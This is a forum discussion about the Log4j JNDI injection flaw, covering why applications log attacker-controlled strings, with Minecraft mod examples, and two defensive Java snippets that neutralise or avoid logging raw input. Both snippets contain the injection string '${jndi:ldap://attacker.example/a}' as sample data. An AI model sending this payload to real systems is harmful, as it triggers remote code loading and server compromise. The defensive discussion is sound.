As I understand it from other articles, in most cases they aren't logging user input in the sense that users typed stuff into a form and that text was logged; they are logging data, like the user-agent example mentioned above, that is normally generated automatically but can be set manually by malicious actors.
I say in most cases, because one blog I read mentioned that some of this enterprise software was using the library to explicitly log suspicious text manually entered by users, like strange input being put into username/password fields. Ironically enough, this was being done to try and catch malicious actors attempting to hack the site.
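To make the user-agent case concrete, here is a minimal Java sketch of how an attacker-chosen header value ends up in a log message, plus one way to defuse it first. The class and the `neutralize` helper are hypothetical names made up for this illustration, and it uses `java.util.logging` only so that it runs without extra dependencies. Breaking up `${` is a stopgap under those assumptions, not a substitute for upgrading the logging library.

```java
import java.util.logging.Logger;

// Illustrative only: the class and method names are hypothetical, not from any library.
class UntrustedLogInput {
    private static final Logger LOG = Logger.getLogger("demo");

    // Break every "${" so the text can no longer start a lookup expression
    // if it later reaches a logger that interpolates message text.
    static String neutralize(String untrusted) {
        if (untrusted == null) {
            return "null";
        }
        return untrusted.replace("${", "$_{");
    }

    public static void main(String[] args) {
        // A User-Agent header is normally set by the browser,
        // but any client can send whatever string it likes.
        String userAgent = "${jndi:ldap://attacker.example/a}";
        LOG.info("Request from user agent: " + neutralize(userAgent));
    }
}
```

Because nested tricks still have to begin with `${`, breaking that two-character sequence everywhere covers them as well, at the cost of slightly altering what gets logged.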
My main question is: why would you log stuff that could potentially inject this kind of thing?
Most devs using the library probably didn't even know the library could execute strings. Which is totally understandable, because who in their right mind would ever think a logging library would do that.
So the question that pops up right on top of it is: Is this really that huge of a problem?
I'm not a Java guy, but I've got a few years' experience modding Minecraft, which uses the library. Thinking back, I've seen a few cases where this could be exploited in moderately popular mods.
For example, Forge, the de facto Minecraft modding framework, allows inter-mod communication, and more than a few times I've seen mods log these messages when they don't match the expected patterns. So any Minecraft server can be compromised if a malicious mod is installed.
In another example, the game has slash commands in chat, and I've seen more than a few mods that log the text of malformed commands; I wouldn't be surprised if some of the built-in ones do as well. With that, a server can be compromised by any malicious user who logs on and chats.
Granted, this is just a game, but as far as games go Minecraft is big business and one where there are plenty of griefers ready and willing to take advantage.
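For the malformed-command case, one option is to log a description of what happened rather than the raw text. The sketch below is only an illustration under assumptions: the class and method names are hypothetical, the player is identified by a server-side UUID rather than a name the client picked, and `hashCode` serves as a rough fingerprint for spotting repeats, not as a secure hash.

```java
import java.util.UUID;

// Illustrative only: names are hypothetical and not part of Forge or Minecraft.
class DescriptiveLogging {
    // Describe a rejected chat command without echoing any of its text.
    static String describeMalformedCommand(UUID playerId, String rawCommand) {
        int length = rawCommand == null ? 0 : rawCommand.length();
        // Rough fingerprint so repeated attempts can be correlated in the log.
        int fingerprint = rawCommand == null ? 0 : rawCommand.hashCode();
        return String.format(
                "Rejected malformed command from player %s (length=%d, fingerprint=%08x)",
                playerId, length, fingerprint);
    }

    public static void main(String[] args) {
        UUID player = UUID.randomUUID();
        String raw = "/give ${jndi:ldap://attacker.example/a}";
        // The resulting line contains nothing the sender typed.
        System.out.println(describeMalformedCommand(player, raw));
    }
}
```

The trade-off is that the log no longer shows exactly what was typed, which makes debugging a genuinely broken command harder.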
I assumed that, when logging, companies log descriptive info. For example, if someone is trying something funny, then "this IP or this user is hitting this endpoint too much..." or something like that.
Ah, there's the problem: we're talking about Enterprise software here. You should always assume that the project was outsourced to underpaid interns who barely understand the problem domain, will ignore the spec, and think programming is throwing copy/pasted Stack Overflow answers at the wall until the client goes away, the company goes bankrupt, or they move on to their next job.
In other words...
Is this really that huge of a problem?
Oh yea, you can bet money that to some level this vulnerability sits in just about every major Java code base at every major Java company that uses log4j. One could probably start an international sports league with the number of devs who just learned log4j could do this and are now rushing to fix their various products.
Thanks for the great input. Regarding "is this that huge of a problem": I'm asking from a technical point of view, not a business one. Bad decisions were made, and of course it is a problem, but the question is why. Regarding logging the user's browser or such, again, why? If there's a problem, ask the user for that data; why collect the data beforehand? It all boils down again to obsessive analytics that cost more in collection and data processing than they bring in value to the business. But what do I know, right? There's a reason these managers are paid good money to make us do these things, right?
I fully agree, a logger should just log. But one more thing, just to be realistic about the impact area: in the cloud era, don't people use proxies to log network stuff? Like fire up Java apps in Kubernetes and let proxies log data like that before the app is even hit? Again, making the app log only the descriptive part, and only when it actually has to.
Reading posts from devs finding and patching these issues in their projects, the answer to "why" these things were being logged is as varied as the codebases. There are definitely too many cases of some pointy-haired manager demanding more analytics to impress their even pointier-haired bosses, but in many cases it is for the normal reason any dev logs anything: to help ensure the code is running correctly.
To all your very reasonable questions asking "but don't they do X"... unfortunately, nine times out of ten, the answer is, yes, that is what they should do, but, no, that isn't what they do.
If you have any illusion that these big tech companies are bastions of best practices and clean code, just go read the archives of The Daily WTF or the rants on devRant. There is a reason that calling something Enterprise Software™ is considered an insult.
The main brunt of this problem will be felt by companies using interns and underpaid devs in small orgs like local banks and various other IT services.
Big tech giants know to push a fix immediately, but you can't expect every small-scale startup to know about this and fix it right away. And if you're small, an attack as simple as this can wipe out your company.
I hope everyone uses Cloudflare or some other CDN, because Cloudflare has begun handling these malicious user strings even on its free plan.